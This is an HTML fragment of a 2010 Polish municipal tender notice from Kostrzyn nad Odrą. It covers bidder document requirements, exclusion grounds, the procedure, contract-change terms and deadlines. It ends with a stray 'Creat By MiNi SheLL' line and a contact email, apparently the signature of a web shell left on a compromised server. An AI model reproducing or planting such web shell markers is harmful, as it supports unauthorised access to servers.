<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy sporządzony wg. wzoru stanowiącego załącznik nr 1 do siwz, Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych. Informacja o powierzeniu części zamówienia podwykonawcom.Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym i osobach zdolnych do wykonania zamówienia innych podmiotów, zgodnie z art. 26 ust. 2b ustawy..</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany postanowień umowy w następujących przypadkach: a) zmiany terminów realizacji przedmiotu umowy w przypadku wystąpienia zmiany terminu zakończenia robót budowlanych, b) zmiany osób pełniących funkcję Inspektorów Nadzoru Inwestorskiego w poszczególnych branżach, pod warunkiem, że osoby te, będą spełniały wymagania określone w ogłoszeniu o zamówieniu i w siwz, c) zmiany osobowej podwykonawców oraz zakresu podwykonawstwa, Poza postanowieniami określonymi powyżej Zamawiający przewiduje możliwość innych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. Każda zmiana i uzupełnienie umowy, będzie wymagać aneksu w formie pisemnej pod rygorem nieważności. Poza innymi przypadkami określonymi w treści Umowy, zmiany Umowy będą mogły być wprowadzane w związku z zaistnieniem okoliczności, których wystąpienia Zamawiający i Wykonawca nie przewidywali w chwili zawierania Umowy. Wskazane okoliczności nie mogą być wywołane zarówno przez Zamawiającego, jak i Wykonawcę, ani przez nich zawinione i muszą wywoływać ten skutek, iż Umowa nie będzie mogła być wykonana wedle pierwotnej treści, w szczególności z uwagi na rażącą stratę grożącą jednemu z nich lub niemożność osiągnięcia celu Umowy. Okoliczności te odnosić się mogą w szczególności do wystąpienia nagłych zmian stanu prawnego, gwałtownej dekoniunktury, kryzysów finansowych w skali ponadpaństwowej, konieczności uwzględnienia wpływu ewentualnych prac zamiennych na realizację przedmiotu umowy. Niezależnie od powyższego, Zamawiający dopuszcza możliwość zmian redakcyjnych Umowy oraz zmian będących następstwem zmian danych zarówno jego, jak i Wykonawcy ujawnionych w rejestrach publicznych, a także zmian korzystnych z punktu widzenia realizacji przedmiotu umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego na wykonanie, utrzymanie lub użytkowanie przedmiotu umowy bądź zwiększających użyteczność przedmiotu umowy. W takiej sytuacji, wprowadzone zostaną do umowy stosowne zmiany weryfikujące redakcyjne dotychczasowe brzmienie umowy bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych albo też kierując się poszanowaniem wzajemnych interesów, zasadą równości oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania przedmiotu umowy, określą zmiany korzystne z punktu widzenia realizacji przedmiotu umowy. Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności art. 140 ust. 3 PZP oraz zasad ogólnych rządzących tą ustawą..</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kostrzyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kostrzyn nad Odrą, ul. Graniczna 2, 66-470 Kostrzyn nad Odrą, Referat Inwestycji i Remontów, pokój nr 22...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2010 godzina 09:30, miejsce: Urząd Miasta Kostrzyn nad Odrą, ul. Graniczna 2, 66-470 Kostrzyn nad Odrą, sekretariat - II piętro...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 13.10.2010.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Współpracy Transgranicznej Polska (Województwo Lubuskie) - Brandenburgia 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com